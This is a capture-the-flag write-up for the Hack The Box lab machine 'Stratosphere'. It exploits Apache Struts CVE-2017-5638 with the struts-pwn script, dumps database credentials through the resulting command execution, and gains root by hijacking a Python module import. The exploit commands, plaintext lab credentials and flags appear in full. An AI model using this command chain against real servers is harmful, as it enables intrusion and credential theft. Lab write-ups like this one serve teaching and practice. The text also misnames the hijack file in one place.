Writeup: Hack The Box - Machines - Stratosphere

Description

  • Name: Stratosphere
  • IP: 10.10.10.64
  • Author: linted
  • Difficulty: 5.2/10

Discovery

nmap -sV -sC -Pn -p 1-65535 -T5 --min-rate 1000 --max-retries 5 10.10.10.64

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
22/tcp   open  ssh        OpenSSH 7.4p1 Debian 10+deb9u2 (protocol 2.0)
| ssh-hostkey:
| 2048 5b:16:37:d4:3c:18:04:15:c4:02:01:0d:db:07:ac:2d (RSA)
| 256 e3:77:7b:2c:23:b0:8d:df:38:35:6c:40:ab:f6:81:50 (ECDSA)
|_ 256 d7:6b:66:9c:19:fc:aa:66:6c:18:7a:cc:b5:87:0e:40 (ED25519)
80/tcp open http
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.1 404
| Content-Type: text/html;charset=utf-8
| Content-Language: en
| Content-Length: 1114
| Date: Mon, 09 Jul 2018 13:08:48 GMT
| Connection: close
| <!doctype html><html lang="en"><head><title>HTTP Status 404
| Found</title><style type="text/css">h1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} h2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} h3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} body {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} b {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} p {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;} a {color:black;} a.name {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body>
| GetRequest:
| HTTP/1.1 200
| Accept-Ranges: bytes
| ETag: W/"1708-1519762495000"
| Last-Modified: Tue, 27 Feb 2018 20:14:55 GMT
| Content-Type: text/html
| Content-Length: 1708
| Date: Mon, 09 Jul 2018 13:08:47 GMT
| Connection: close
| <!DOCTYPE html>
| <html>
| <head>
| <meta charset="utf-8"/>
| <title>Stratosphere</title>
| <link rel="stylesheet" type="text/css" href="main.css">
| </head>
| <body>
| <div id="background"></div>
| <header id="main-header" class="hidden">
| <div class="container">
| <div class="content-wrap">
| <p><i class="fa fa-diamond"></i></p>
| <nav>
| class="btn" href="GettingStarted.html">Get started</a>
| </nav>
| </div>
| </div>
| </header>
| <section id="greeting">
| <div class="container">
| <div class="content-wrap">
| <h1>Stratosphere<br>We protect your credit.</h1>
| class="btn" href="GettingStarted.html">Get started now</a>
| <p><i class="ar
| HTTPOptions:
| HTTP/1.1 200
| Allow: GET, HEAD, POST, PUT, DELETE, OPTIONS
| Content-Length: 0
| Date: Mon, 09 Jul 2018 13:08:47 GMT
| Connection: close
| RTSPRequest, X11Probe:
| HTTP/1.1 400
| Transfer-Encoding: chunked
| Date: Mon, 09 Jul 2018 13:08:47 GMT
|_ Connection: close
| http-methods:
|_ Potentially risky methods: PUT DELETE
|_http-title: Stratosphere
8080/tcp open http-proxy
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200
| Accept-Ranges: bytes
| ETag: W/"1708-1519762495000"
| Last-Modified: Tue, 27 Feb 2018 20:14:55 GMT
| Content-Type: text/html
| Content-Length: 1708
| Date: Mon, 09 Jul 2018 13:08:47 GMT
| Connection: close
| <!DOCTYPE html>
| <html>
| <head>
| <meta charset="utf-8"/>
| <title>Stratosphere</title>
| <link rel="stylesheet" type="text/css" href="main.css">
| </head>
| <body>
| <div id="background"></div>
| <header id="main-header" class="hidden">
| <div class="container">
| <div class="content-wrap">
| <p><i class="fa fa-diamond"></i></p>
| <nav>
| class="btn" href="GettingStarted.html">Get started</a>
| </nav>
| </div>
| </div>
| </header>
| <section id="greeting">
| <div class="container">
| <div class="content-wrap">
| <h1>Stratosphere<br>We protect your credit.</h1>
| class="btn" href="GettingStarted.html">Get started now</a>
|_ <p><i class="ar
| http-methods:
|_ Potentially risky methods: PUT DELETE
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Stratosphere

With dirsearch:

1
2
3
200 -    2KB - /
302 - 0B - /manager -> /manager/
302 - 0B - /Monitoring -> /Monitoring/

Pwn

The Tomcat server (on port 80 and 8080) is protected by a http authentication but in /Monitoring/ we got redirect to http://10.10.10.64/Monitoring/example/Login_input.action the .action reminded us of the Apache Struts RCE (the Jakarta one): CVE-2017-5638.

A nice script to exploit the RCE is struts-pwn; the pattern to run the script is:

python exploit.py -u http://10.10.10.64/Monitoring/example/Login_input.action -c "id"

1
2
3
4
5
6
7
8
9
10
[*] URL: http://10.10.10.64/Monitoring/example/Login_input.action
[*] CMD: id
[!] ChunkedEncodingError Error: Making another request to the url.
Refer to: https://github.com/mazen160/struts-pwn/issues/8 for help.
EXCEPTION::::--> ('Connection broken: IncompleteRead(0 bytes read)', IncompleteRead(0 bytes read))
Note: Server Connection Closed Prematurely

uid=115(tomcat8) gid=119(tomcat8) groups=119(tomcat8)

[%] Done.

And the command will return the output of the id command.

We first got that the user flag is for richard and not tomcat8 so we need to find a way to login as richard. Obviously shadow and /home/richard/user.txt cannot be accessed.

On the Tomcat folder we found a file called db_connect with some credentials and in /etc/tomcat8/tomcat-users.xml we found another username:password combination.

None of those credentials were useful to login as richard via SSH.

Since the file db_connect could be used to connect to the running server MySQL we can use the RCE to issue comands to mysql.

1
2
3
4
5
6
7
[ssn]
user=ssn_admin
pass=AWs64@on*&

[users]
user=admin
pass=admin

First we tried to list all databases:

python exploit.py -u http://10.10.10.64/Monitoring/example/Login_input.action -c "echo show databases | mysql -u admin -padmin"

1
2
3
4
5
6
7
8
9
10
[*] URL: http://10.10.10.64/Monitoring/example/Login_input.action
[*] CMD: echo show databases | mysql -u admin -padmin
[!] ChunkedEncodingError Error: Making another request to the url.
Refer to: https://github.com/mazen160/struts-pwn/issues/8 for help.
EXCEPTION::::--> ('Connection broken: IncompleteRead(0 bytes read)', IncompleteRead(0 bytes read))
Note: Server Connection Closed Prematurely

Database
information_schema
users

And with the same pattern of commands we got that the DB users has two tables: Tables_in_users (we don’t have rights to access) and accounts.

Usefull command to get the content of the table accounts:

  • echo show tables | mysql -u admin -padmin users
  • echo describe accounts | mysql -u admin -padmin users
  • echo SELECT fullName,password,username FROM accounts | mysql -u admin -padmin users (using * in query will crash the server)

So we got:

1
2
fullName	        password	                username
Richard F. Smith 9tc*rhKuG5TyXvUJOrE^5CK7k richard

Using those credentials we could login via SSH a richard.

In the home directory we also found a python script and with sudo -l we disovered that the script can be runned by richard as root without password: (ALL) NOPASSWD: /usr/bin/python* /home/richard/test.py.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
#!/usr/bin/python3
import hashlib


def question():
q1 = input("Solve: 5af003e100c80923ec04d65933d382cb\n")
md5 = hashlib.md5()
md5.update(q1.encode())
if not md5.hexdigest() == "5af003e100c80923ec04d65933d382cb":
print("Sorry, that's not right")
return
print("You got it!")
q2 = input("Now what's this one? d24f6fb449855ff42344feff18ee2819033529ff\n")
sha1 = hashlib.sha1()
sha1.update(q2.encode())
if not sha1.hexdigest() == 'd24f6fb449855ff42344feff18ee2819033529ff':
print("Nope, that one didn't work...")
return
print("WOW, you're really good at this!")
q3 = input("How about this? 91ae5fc9ecbca9d346225063f23d2bd9\n")
md4 = hashlib.new('md4')
md4.update(q3.encode())
if not md4.hexdigest() == '91ae5fc9ecbca9d346225063f23d2bd9':
print("Yeah, I don't think that's right.")
return
print("OK, OK! I get it. You know how to crack hashes...")
q4 = input("Last one, I promise: 9efebee84ba0c5e030147cfd1660f5f2850883615d444ceecf50896aae083ead798d13584f52df0179df0200a3e1a122aa738beff263b49d2443738eba41c943\n")
blake = hashlib.new('BLAKE2b512')
blake.update(q4.encode())
if not blake.hexdigest() == '9efebee84ba0c5e030147cfd1660f5f2850883615d444ceecf50896aae083ead798d13584f52df0179df0200a3e1a122aa738beff263b49d2443738eba41c943':
print("You were so close! urg... sorry rules are rules.")
return

import os
os.system('/root/success.py')
return

question()

The script will ask some “questions” that we need to answer/solve in order to execute /root/success.py as root.

Since the cracking time of the first MD5 was a way too long we realized that we could exploit the script to run every commands we want: when test.py will call import hashlib it’ll first search for any file called hashlib.py in the current directory.

Creating a python file called hashlist.py with this payload print(open("/root/root.txt").read()) we gained the root flag!

Flags

user: e610b298611fa732fca1665a1c02336b

root: d41d8cd98f00b204e9800998ecf8427e